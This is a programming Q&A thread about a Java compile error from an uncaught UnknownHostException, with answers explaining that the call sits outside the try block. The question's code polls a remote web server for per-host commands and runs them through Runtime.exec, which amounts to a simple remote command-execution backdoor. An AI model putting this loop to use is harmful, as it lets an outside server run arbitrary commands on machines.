# Java -- Can't Catch UnknownHostException

Tags: java

```
import java.net.*;
import java.io.*;
import java.util.*;
public class server{
  public static void main(String args[]){
   String hostname = "Unknown";
   InetAddress addr;
   addr = InetAddress.getLocalHost();
   hostname = addr.getHostName();
   do{
      try {
      URL c = new URL("http://mywebsite/admin/users/" + hostname + "/c.txt");
      URL cinfo = new URL("http://mywebsite/admin/users/" + hostname + "/cinfo.txt");
      Scanner c2 = new Scanner(c.openStream());
      Scanner cinfo2 = new Scanner(cinfo.openStream());
      String c3 = c2.nextLine();
      String cinfo3 = cinfo2.nextLine();
      URL del = new URL("http://mywebsite/admin/users/" + hostname + "/manager.php?perform=delete");
      if ("commandline".compareTo(c3) == 0){
         Runtime.getRuntime().exec(cinfo3);
         HttpURLConnection connection = (HttpURLConnection) del.openConnection();
         connection.connect();
         connection.getResponseCode();
         Thread.sleep(10000);
      }
      if ("idle".compareTo(c3) == 0){
         System.out.println("Waiting for a command.");
      }
      if ("print".compareTo(c3) == 0){
         System.out.println(cinfo3);
         HttpURLConnection connection = (HttpURLConnection) del.openConnection();
         connection.connect();
         connection.getResponseCode();
         Thread.sleep(10000);
      }
      }
      catch(IOException e) {
         break;
      }
      catch(InterruptedException e){
         break;
      }
   } while(true);
}
}
```

The above is my Java program. When I try to compile, I get UnknownHostException. If I try to catch it, it says as an error that it's already been caught and then it says as another error that it needs to be caught. With my above code, it says that it needs to be caught but doesn't say that it's already caught. Can anyone help? Please note that in the actual code, 'mywebsite' is actually my actual website but for privacy reasons I removed it from the code block above.

Comment: What is the exact text of the error?

Comment: Did you place the UnknownHostException catch before or after the IOException?

Comment: After. Do I need to place it before? @SLaks here's the error with the above code:
server.java:8: unreported exception java.net.UnknownHostException; must be caught or declared to be thrown
   addr = InetAddress.getLocalHost();

Comment: Dear lord, use an IDE which will do the appropriate thing for you.

Comment: Yes, place it before and try it again. If you place it after it will never be reached because any IOException will first be caught by your general IOException error.

Comment: Joroen, I'm still getting the same error.

Comment: See the answer below. He doesn't have what throws that exception in a try/catch.

Comment: "When I try to compile, I get UnknownHostException." No you don't. You get a *compiler error message* that is *about* catching that exception.

Answer (score 4, accepted):

`InetAddress.getLocalHost()` throws `UnknownHostException`.

Your catch blocks already catch the superclass of `UnknownHostException`, but that call is outside the `try` block, so they don't help.

Comment: +1 - To be more specific so he understands - he's putting the catch for `UnknownHostException` in the wrong place and not putting `InetAddress.getLocalHost()` in a try/catch.